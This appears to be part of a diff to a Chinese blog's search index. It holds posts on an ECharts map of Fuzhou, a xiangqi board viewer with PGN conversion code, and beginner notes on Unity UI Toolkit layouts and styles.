    <div id="chart" style="width: 100%; height: 400px; margin: 0 auto; margin-top: 1em; margin-bottom: 1em;"></div>

    ​JS 中导入 ECharts:

    1
    <script src="XXX/echarts.min.js"></script>

    ​再写一个 JS 控制这个 <div id="chart"></div>(这里还不太熟练,抄抄别人的,然后看看官方文档,问问 ChatGPT,拼凑出如下臭臭代码):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    var dom = document.getElementById('chart');
    var myChart = echarts.init(dom, null, {
    renderer: 'canvas',
    useDirtyRect: false
    });
    var app = {};
    var option;

    var img = new Image();
    img.src = 'Fuzhou.webp';

    img.onload = function () {
    $.get(
    'Fuzhou.svg',
    function (svg) {
    echarts.registerMap('sicily', { svg: svg });
    option = {
    tooltip: {},
    geo: [
    {
    map: 'sicily',
    roam: true,
    layoutCenter: ['50%', '50%'],
    layoutSize: '150%',
    selectedMode: 'single',
    itemStyle: {
    color: undefined
    },
    emphasis: {
    itemStyle: {
    color: 'rgba(0, 255, 255, 0.25)',
    },
    label: {
    show: false
    }
    },
    selectedMode: false,

    regions: [
    {
    //地图区域的名称
    name: "福州市",
    // 该区域的多边形样式设置
    itemStyle: {
    areaColor: {
    type: 'image',
    image: img,
    repeat: 'no-repeat',
    },
    borderColor: '#111',
    //图形阴影的模糊大小
    shadowBlur: 5,
    //阴影颜色
    shadowColor: "#000",
    //shadowOffsetY
    shadowOffsetY: 5,
    //透明度
    opacity: 1
    },
    emphasis: {
    itemStyle: {
    areaColor: {
    type: 'image',
    image: img,
    repeat: 'no-repeat',
    },
    borderColor: '#111',
    shadowBlur: 5,
    shadowColor: "#000",
    shadowOffsetY: 5,
    opacity: 1
    },
    },
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [];
    }
    }
    },
    {
    name: "鼓楼区",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '鼓楼区',
    '啊!三坊七巷真是太好玩了!'
    ].join('<br/>');
    }
    }
    },
    {
    name: "仓山区",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '仓山区',
    '我们的时代多美好~像朝霞漫天灿烂~'
    ].join('<br/>');
    }
    }
    },
    {
    name: "闽侯县",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '闽侯县',
    '知明行笃~立诚致广~全面求发展~'
    ].join('<br/>');
    }
    }
    },
    {
    name: "长乐区",
    tooltip: {
    show: true,
    confine: true,
    formatter: function () {
    return [
    '长乐区',
    '闽江江水都流向~流向长乐的海~'
    ].join('<br/>');
    }
    }
    },
    ]
    }
    ],
    };
    myChart.setOption(option);
    myChart.on('selectchanged', function (params) {
    if (!params.selected.length) {
    myChart.dispatchAction({
    type: 'hideTip'
    });
    myChart.dispatchAction({
    type: 'geoSelect',
    geoIndex: 0
    // Use no name to unselect.
    });
    } else {
    var btnDataIdx = params.selected[0].dataIndex[0];
    var name = option.series.data[btnDataIdx][2];
    myChart.dispatchAction({
    type: 'geoSelect',
    geoIndex: 0,
    name: name
    });
    myChart.dispatchAction({
    type: 'showTip',
    geoIndex: 0,
    name: name
    });
    }
    });
    }
    );

    if (option && typeof option === 'object') {
    myChart.setOption(option);
    }

    myChart.on('click', function (params) {
    // 获取选中项的宽度和高度
    console.log("选中项: ", params.event);
    });

    window.addEventListener('resize', myChart.resize);
    };
    ]]>
    @@ -2469,7 +2469,7 @@ /posts/Web-xiangqiJS/ - 资源

    代码

    快速开始

    ​创建棋盘只需要 xiangqiboard.js,从源码下载地址下载源码并导入网页中:

    <link rel="stylesheet" type="text/css" href="css/xiangqiboard-0.3.3.css">
    <script type="text/javascript" src="js/xiangqiboard-0.3.3.min.js"></script>

    ​在本博客中,为了增加代码的复用性,在特定地址中放置图片资源的位置,config 中设定好对应的位置:

    const test_config = {
    boardTheme: '../../../../js/xiangqiboard/img/xiangqiboards/wikimedia/xiangqiboard.svg',
    pieceTheme: '../../../../js/xiangqiboard/img/xiangqipieces/wikimedia/{piece}.svg',
    position: 'start'
    };

    ​创建棋盘:

    <div id="board1" style="margin: 0 auto; width: min(450px, 100%); overflow: auto;"></div>
    <script>const board1 = Xiangqiboard('board1', test_config)</script>

    棋谱展示

    圣光将赐予我胜利!

    实现细节

    ​从 源码下载地址 引入 xiangqi.js

    <script type="text/javascript" src="/js/xiangqi.js"></script>

    ​添加高亮 CSS:

    .highlight-red {
    box-shadow: inset 0 0 3px 3px yellow;
    }
    .highlight-black {
    box-shadow: inset 0 0 3px 3px blue;
    }

    ​画一个棋盘。写一个 board.js 用于控制棋盘!再写点辅助工具!

    <div id="board" style="margin: 0 auto; width: min(450px, 100%); overflow: auto;"></div>

    <div id="board-tool" style="margin: 10px auto 5px; width: 450px; display: flex;">
    <button id="start">初局</button>
    <button id="prev">前一步</button>
    <p id="description">圣光将赐予我胜利!</p>
    <button id="next">后一步</button>
    <button id="end">终局</button>
    </div>

    <script type="text/javascript" src="board.js"></script>

    board.js 下的内容:

    let board = null;
    let $board = $('#board');
    let squareClass = 'square-2b8ce'

    let colorToHighlight = null;
    let highlightChess = true;
    let squareToHighlight = null;

    var $boardTool = $("#board-tool");
    var $prevButton = $boardTool.find("#prev");
    var $description = $boardTool.find("#description");
    var $nextButton = $boardTool.find("#next");
    var $startButton = $boardTool.find("#start");
    var $endButton = $boardTool.find("#end");

    var totalSteps = 0;

    var game = new Xiangqi();

    const pgn = ['[Game "Chinese Chess"]',
    '[Event "Test"]',
    '[Date "2024.04.16"]',
    '[Red "A"]',
    '[Black "B"]',
    '[Result "1/2-1/2"]',
    '[Format "ICCS"]',
    '',
    '1. b2e2 b9c7',
    '2. b0c2 a9b9',
    '3. a0b0h9g7',
    '4. g3g4 c6c5',
    '5. h0g2h7h3',
    '6. e3e4 b7b3',
    '7. i0i1h3g3',
    '8. g0i2 i9h9',
    '9. i1f1g3d3',
    '10. f1f7 d3d2',
    '11. g2f4 d2h2',
    '12. f4e6 c7e6',
    '13. e2e6 b9b6',
    '14. e6e5 e9e8',
    '15. f7g7h9h3',
    '16. g7g9']

    function initXiangqi() {
    console.log("载入 PGN:" + game.load_pgn(pgn.join('\n')), game.header());
    totalSteps = game.history().length;
    do {
    flag = game.undo();
    } while (flag);
    }

    function initXiangqiboard() {
    function onMoveEnd() {
    if (highlightChess)
    {
    $board.find('.square-' + squareToHighlight)
    .addClass('highlight-' + colorToHighlight);
    }
    }

    let config = {
    boardTheme: '../../../../js/xiangqiboard/img/xiangqiboards/wikimedia/xiangqiboard.svg',
    pieceTheme: '../../../../js/xiangqiboard/img/xiangqipieces/wikimedia/{piece}.svg',
    position: game.fen(),
    draggable: true,
    onMoveEnd: onMoveEnd
    };

    board = Xiangqiboard($board, config);
    }

    function initXiangqiboardTool() {
    $startButton.click(function () {
    console.log("初始按钮被点击了");
    do {
    move = game.undo();
    removehighlight(move);
    } while (move);

    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    $endButton.click(function () {
    console.log("终局按钮被点击了");
    do {
    move = game.redo();
    removehighlight(move);
    } while (move);

    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());

    });

    $prevButton.click(function () {
    console.log("前一步按钮被点击了");
    move = game.undo();
    highlight(move);
    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    $nextButton.click(function () {
    console.log("后一步按钮被点击了");
    move = game.redo();
    highlight(move);
    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    function removehighlight(move){
    console.log(move);
    $board.find('.' + squareClass).removeClass('highlight-red');
    $board.find('.' + squareClass).removeClass('highlight-black');
    highlightChess = false;
    }

    function highlight(move) {
    console.log(move);
    if (move) {
    if (move.color === 'r') {
    $board.find('.' + squareClass).removeClass('highlight-red');
    $board.find('.square-' + move.from).addClass('highlight-red');
    squareToHighlight = move.to;
    colorToHighlight = 'red';
    } else {
    $board.find('.' + squareClass).removeClass('highlight-black');
    $board.find('.square-' + move.from).addClass('highlight-black');
    squareToHighlight = move.to;
    colorToHighlight = 'black';
    }
    highlightChess = true;
    }
    }
    }

    $(document).ready(function () {
    initXiangqi();
    initXiangqiboard();
    initXiangqiboardTool();
    });
    • initXiangqi(); 初始化象棋走棋逻辑。
    • initXiangqiboard(); 初始化象棋棋盘逻辑。
    • initXiangqiboardTool(); 初始化象棋辅助工具逻辑。

    处理 PGN 格式

    xiangqi.jsload_pgn() 对 PGN 读取形式似乎有些不同:

    ​直接读取象棋巫师生成的或是其它地方下载的 PGN 棋谱将会失败。得用 Python-Chinese-Chess 处理一番!


    ​对于象棋巫师瞎下的 XXX.PGN

    [Game "Chinese Chess"]
    [Event ""]
    [Round ""]
    [Date ""]
    [Site ""]
    [RedTeam ""]
    [Red ""]
    [BlackTeam ""]
    [Black ""]
    [Result "*"]
    [ECCO "C04"]
    [Opening "中炮七路马对屏风马"]
    [Variation "红进中兵对黑双炮过河"]
    1. 炮八平五 马2进3
    2. 马八进七 车1平2
    3. 车九平八 马8进7
    4. 兵三进一 卒3进1
    5. 马二进三 炮8进4
    6. 兵五进一 炮2进4
    7. 车一进一 炮8平7
    8. 相三进一 车9平8
    9. 车一平四 炮7平4
    10. 车四进六 炮4进1
    11. 马三进四 炮4平8
    12. 马四进五 马3进5
    13. 炮五进四 车2进3
    14. 炮五退一 将5进1
    15. 车四平三 车8进6
    16. 车三进二 *
    ======================
    欢迎访问象棋百科全书网
    推荐用象棋巫师观赏棋谱
    http://www.xqbase.com/

    ​将上面的 PGN 文件转成 xiangqi.js 所识别的格式的处理代码:

    import cchess

    board = cchess.Board.from_pgn("XXX.PGN") # 象棋巫师导出的 PGN 格式

    # 头文件,自己改
    pgn = """[Game "Chinese Chess"]
    [Event "Test"]
    [Date "2024.04.16"]
    [Red "A"]
    [Black "B"]
    [Result "*"]
    [Format "ICCS"]

    """

    for s in board.to_pgn(format="ICCS").split('\n'):
    if(s[0:4] == '[Gen'):
    start_fen = s.split(' ')[1][1:]
    elif(s[0] != '['):
    temp = '. '.join(s.lower().replace("-", "").split('.'))
    pgn += temp + '\n'
    pgn.split('\n')[:-1]

    ​Jupyter Notebook 输出:

    ['[Game "Chinese Chess"]',
    '[Event "Test"]',
    '[Date "2024.04.16"]',
    '[Red "A"]',
    '[Black "B"]',
    '[Result "1/2-1/2"]',
    '[Format "ICCS"]',
    '',
    '1. b2e2 b9c7',
    '2. b0c2 a9b9',
    '3. a0b0 h9g7',
    '4. g3g4 c6c5',
    '5. h0g2 h7h3',
    '6. e3e4 b7b3',
    '7. i0i1 h3g3',
    '8. g0i2 i9h9',
    '9. i1f1 g3d3',
    '10. f1f7 d3d2',
    '11. g2f4 d2h2',
    '12. f4e6 c7e6',
    '13. e2e6 b9b6',
    '14. e6e5 e9e8',
    '15. f7g7 h9h3',
    '16. g7g9']
    ]]>
    + 资源

    代码

    快速开始

    ​创建棋盘只需要 xiangqiboard.js,从源码下载地址下载源码并导入网页中:

    1
    2
    <link rel="stylesheet" type="text/css" href="css/xiangqiboard-0.3.3.css">
    <script type="text/javascript" src="js/xiangqiboard-0.3.3.min.js"></script>

    ​在本博客中,为了增加代码的复用性,在特定地址中放置图片资源的位置,config 中设定好对应的位置:

    1
    2
    3
    4
    5
    const test_config = {
    boardTheme: '../../../../js/xiangqiboard/img/xiangqiboards/wikimedia/xiangqiboard.svg',
    pieceTheme: '../../../../js/xiangqiboard/img/xiangqipieces/wikimedia/{piece}.svg',
    position: 'start'
    };

    ​创建棋盘:

    1
    2
    <div id="board1" style="margin: 0 auto; width: min(450px, 100%); overflow: auto;"></div>
    <script>const board1 = Xiangqiboard('board1', test_config)</script>

    棋谱展示

    圣光将赐予我胜利!

    实现细节

    ​从 源码下载地址 引入 xiangqi.js

    1
    <script type="text/javascript" src="/js/xiangqi.js"></script>

    ​添加高亮 CSS:

    1
    2
    3
    4
    5
    6
    .highlight-red {
    box-shadow: inset 0 0 3px 3px yellow;
    }
    .highlight-black {
    box-shadow: inset 0 0 3px 3px blue;
    }

    ​画一个棋盘。写一个 board.js 用于控制棋盘!再写点辅助工具!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    <div id="board" style="margin: 0 auto; width: min(450px, 100%); overflow: auto;"></div>

    <div id="board-tool" style="margin: 10px auto 5px; width: 450px; display: flex;">
    <button id="start">初局</button>
    <button id="prev">前一步</button>
    <p id="description">圣光将赐予我胜利!</p>
    <button id="next">后一步</button>
    <button id="end">终局</button>
    </div>

    <script type="text/javascript" src="board.js"></script>

    board.js 下的内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    let board = null;
    let $board = $('#board');
    let squareClass = 'square-2b8ce'

    let colorToHighlight = null;
    let highlightChess = true;
    let squareToHighlight = null;

    var $boardTool = $("#board-tool");
    var $prevButton = $boardTool.find("#prev");
    var $description = $boardTool.find("#description");
    var $nextButton = $boardTool.find("#next");
    var $startButton = $boardTool.find("#start");
    var $endButton = $boardTool.find("#end");

    var totalSteps = 0;

    var game = new Xiangqi();

    const pgn = ['[Game "Chinese Chess"]',
    '[Event "Test"]',
    '[Date "2024.04.16"]',
    '[Red "A"]',
    '[Black "B"]',
    '[Result "1/2-1/2"]',
    '[Format "ICCS"]',
    '',
    '1. b2e2 b9c7',
    '2. b0c2 a9b9',
    '3. a0b0h9g7',
    '4. g3g4 c6c5',
    '5. h0g2h7h3',
    '6. e3e4 b7b3',
    '7. i0i1h3g3',
    '8. g0i2 i9h9',
    '9. i1f1g3d3',
    '10. f1f7 d3d2',
    '11. g2f4 d2h2',
    '12. f4e6 c7e6',
    '13. e2e6 b9b6',
    '14. e6e5 e9e8',
    '15. f7g7h9h3',
    '16. g7g9']

    function initXiangqi() {
    console.log("载入 PGN:" + game.load_pgn(pgn.join('\n')), game.header());
    totalSteps = game.history().length;
    do {
    flag = game.undo();
    } while (flag);
    }

    function initXiangqiboard() {
    function onMoveEnd() {
    if (highlightChess)
    {
    $board.find('.square-' + squareToHighlight)
    .addClass('highlight-' + colorToHighlight);
    }
    }

    let config = {
    boardTheme: '../../../../js/xiangqiboard/img/xiangqiboards/wikimedia/xiangqiboard.svg',
    pieceTheme: '../../../../js/xiangqiboard/img/xiangqipieces/wikimedia/{piece}.svg',
    position: game.fen(),
    draggable: true,
    onMoveEnd: onMoveEnd
    };

    board = Xiangqiboard($board, config);
    }

    function initXiangqiboardTool() {
    $startButton.click(function () {
    console.log("初始按钮被点击了");
    do {
    move = game.undo();
    removehighlight(move);
    } while (move);

    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    $endButton.click(function () {
    console.log("终局按钮被点击了");
    do {
    move = game.redo();
    removehighlight(move);
    } while (move);

    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());

    });

    $prevButton.click(function () {
    console.log("前一步按钮被点击了");
    move = game.undo();
    highlight(move);
    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    $nextButton.click(function () {
    console.log("后一步按钮被点击了");
    move = game.redo();
    highlight(move);
    board.position(game.fen());
    $description.text(game.history().length.toString() + "/" + totalSteps.toString());
    });

    function removehighlight(move){
    console.log(move);
    $board.find('.' + squareClass).removeClass('highlight-red');
    $board.find('.' + squareClass).removeClass('highlight-black');
    highlightChess = false;
    }

    function highlight(move) {
    console.log(move);
    if (move) {
    if (move.color === 'r') {
    $board.find('.' + squareClass).removeClass('highlight-red');
    $board.find('.square-' + move.from).addClass('highlight-red');
    squareToHighlight = move.to;
    colorToHighlight = 'red';
    } else {
    $board.find('.' + squareClass).removeClass('highlight-black');
    $board.find('.square-' + move.from).addClass('highlight-black');
    squareToHighlight = move.to;
    colorToHighlight = 'black';
    }
    highlightChess = true;
    }
    }
    }

    $(document).ready(function () {
    initXiangqi();
    initXiangqiboard();
    initXiangqiboardTool();
    });
    • initXiangqi(); 初始化象棋走棋逻辑。
    • initXiangqiboard(); 初始化象棋棋盘逻辑。
    • initXiangqiboardTool(); 初始化象棋辅助工具逻辑。

    处理 PGN 格式

    xiangqi.jsload_pgn() 对 PGN 读取形式似乎有些不同:

    ​直接读取象棋巫师生成的或是其它地方下载的 PGN 棋谱将会失败。得用 Python-Chinese-Chess 处理一番!


    ​对于象棋巫师瞎下的 XXX.PGN

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    [Game "Chinese Chess"]
    [Event ""]
    [Round ""]
    [Date ""]
    [Site ""]
    [RedTeam ""]
    [Red ""]
    [BlackTeam ""]
    [Black ""]
    [Result "*"]
    [ECCO "C04"]
    [Opening "中炮七路马对屏风马"]
    [Variation "红进中兵对黑双炮过河"]
    1. 炮八平五 马2进3
    2. 马八进七 车1平2
    3. 车九平八 马8进7
    4. 兵三进一 卒3进1
    5. 马二进三 炮8进4
    6. 兵五进一 炮2进4
    7. 车一进一 炮8平7
    8. 相三进一 车9平8
    9. 车一平四 炮7平4
    10. 车四进六 炮4进1
    11. 马三进四 炮4平8
    12. 马四进五 马3进5
    13. 炮五进四 车2进3
    14. 炮五退一 将5进1
    15. 车四平三 车8进6
    16. 车三进二 *
    ======================
    欢迎访问象棋百科全书网
    推荐用象棋巫师观赏棋谱
    http://www.xqbase.com/

    ​将上面的 PGN 文件转成 xiangqi.js 所识别的格式的处理代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import cchess

    board = cchess.Board.from_pgn("XXX.PGN") # 象棋巫师导出的 PGN 格式

    # 头文件,自己改
    pgn = """[Game "Chinese Chess"]
    [Event "Test"]
    [Date "2024.04.16"]
    [Red "A"]
    [Black "B"]
    [Result "*"]
    [Format "ICCS"]

    """

    for s in board.to_pgn(format="ICCS").split('\n'):
    if(s[0:4] == '[Gen'):
    start_fen = s.split(' ')[1][1:]
    elif(s[0] != '['):
    temp = '. '.join(s.lower().replace("-", "").split('.'))
    pgn += temp + '\n'
    pgn.split('\n')[:-1]

    ​Jupyter Notebook 输出:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    ['[Game "Chinese Chess"]',
    '[Event "Test"]',
    '[Date "2024.04.16"]',
    '[Red "A"]',
    '[Black "B"]',
    '[Result "1/2-1/2"]',
    '[Format "ICCS"]',
    '',
    '1. b2e2 b9c7',
    '2. b0c2 a9b9',
    '3. a0b0 h9g7',
    '4. g3g4 c6c5',
    '5. h0g2 h7h3',
    '6. e3e4 b7b3',
    '7. i0i1 h3g3',
    '8. g0i2 i9h9',
    '9. i1f1 g3d3',
    '10. f1f7 d3d2',
    '11. g2f4 d2h2',
    '12. f4e6 c7e6',
    '13. e2e6 b9b6',
    '14. e6e5 e9e8',
    '15. f7g7 h9h3',
    '16. g7g9']
    ]]>
    @@ -2579,7 +2579,7 @@ /posts/Paper-%E7%BB%84%E4%BC%9A%E6%B1%87%E6%8A%A5/ -
    ]]>
    +
    ]]>
    @@ -2631,7 +2631,7 @@ /posts/Unity-UI%20Toolkit/ - 正文

    Unity UI Toolkit Beginner’s Guide 1: Layout & Style

    ​IMGUI → UGUI → UI Toolkit

    UI Toolkit 是 Unity 的新一代 UI!

    StyleStructure & LayoutInteractions
    WebCSSHTMLJavascript
    UnityUSSUXMLC#

    UI Toolkit 从网页前端中借鉴了思想,引入了 USSUXML 这两个概念。

    png

    Project 里创建一个 UI Document 以获得一个 UXML 文件。

    png

    Hierarchy 里创建一个 UI Document,绑定好 Panel SettingsSource Asset

    png

    ​打开 UXML,界面有点像 Dreamweaver?设置一下 Unity Default Runtime ThemeMatch Game ViewCanvas Background

    png

    ​一阵操作。这个 VisualElement 类比于 Web 里的 <div>,不过只能支持 display: flexLabel 就类比于 <p>

    png

    ​这个字体,可以使用 Font Asset Creator。看上去好厉害的样子!我还搞得不是很懂。

    png

    ​之前的操作全是行内样式,这不太好。创建一个 StyleSheets 以整一些样式表。在对象的 Style Class List 里绑定。

    ​最后得到的 UXML 文件:

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement style="background-color: rgba(255, 0, 0, 0); width: auto; height: 100%; position: relative; align-items: flex-start;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgba(255, 255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 20px; padding-top: 20px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&#10;&#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 24px; margin-left: 20px; margin-right: 20px; margin-top: 20px; margin-bottom: 20px; padding-left: 60px; padding-right: 60px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    ​USS 文件:

    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgba(255, 255, 255, 255);
    background-color: rgba(0, 102, 255, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    Unity UI Toolkit Beginner’s Guide 2: Animating Interaction

    png

    ​UI Toolkit 支持 RelativeAbsolute

    png

    ​对于 Flex,当容器大小不够时,会 shrink

    png

    ​构造一个这样的 UI,通过给元素添加类实现显示之间的切换。

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
